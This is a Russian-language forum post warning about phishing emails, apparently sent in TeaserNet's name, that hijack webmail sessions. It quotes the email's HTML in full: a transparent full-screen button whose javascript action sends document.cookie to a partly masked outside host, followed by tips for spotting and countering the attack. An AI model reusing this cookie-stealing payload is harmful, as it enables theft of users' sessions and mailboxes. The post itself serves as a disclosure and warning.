Опасные письма, ворующие cookies

Не знаю, в каком разделе запостить, но хочу предупредить уважаемое сообщество от вероятного угона почтовых ящиков мыл@(?).

Словил на @мыло письмо следующего содержания:

В Тизернете регистрировался очень давно, да и не на этот e-mail. Восстановление пароля тоже не запрашивал, но прочитать письмо зашёл, чего это они... Поняв, что письмо не представляет собой интереса, кликнул по ссылке назад ко входящим и тут опаньки - ссылка не туда и понял, что "я сболтнул чего-то лишнего".

Смысл следующий: письмо содержит форму с прозрачной кнопкой на весь экран, при клике на которую по замыслу злоумышленника стартует ява-скрипт, грузящий картинку с get-параметрами куков текущего документа. Т.е. нашего мыла.

<form target="_self" action="javascript:delf=document.getElementById('delf');delf.style.display='none';img=new Image();img.src="http://x-...s.ru/cor/s.php?"+document.cookie;" formtarget="_self">
<input id="delf" type=submit value="" style="filter:alpha(opacity=0);-moz-opacity:0;opacity:0;***x70;osition:absolute;z-index:9999999999999;margin-left:-2000px;margin-top:-2000px;width:10000px;height:10000px;">
</form>

Как заметить неладное: курсор мыши не меняет свой вид на "палец" при подведении к ссылкам. Если всё-таки кликнули и видите, что попали не туда куда планировали - сразу меняйте пароль. Ну и https + запрет параллельных сессий - так секьюрнее. Пишу здесь, потому что похоже я не одинок - подобный случай 2 дня назад.

И да, вероятнее всего, уважаемый TeaserNet к этому не имеет никакого отношения, просто хайджэкинг идёт от его имени. От имени отправителя может выступать кто угодно, будьте внимательны, леди и джентльмены.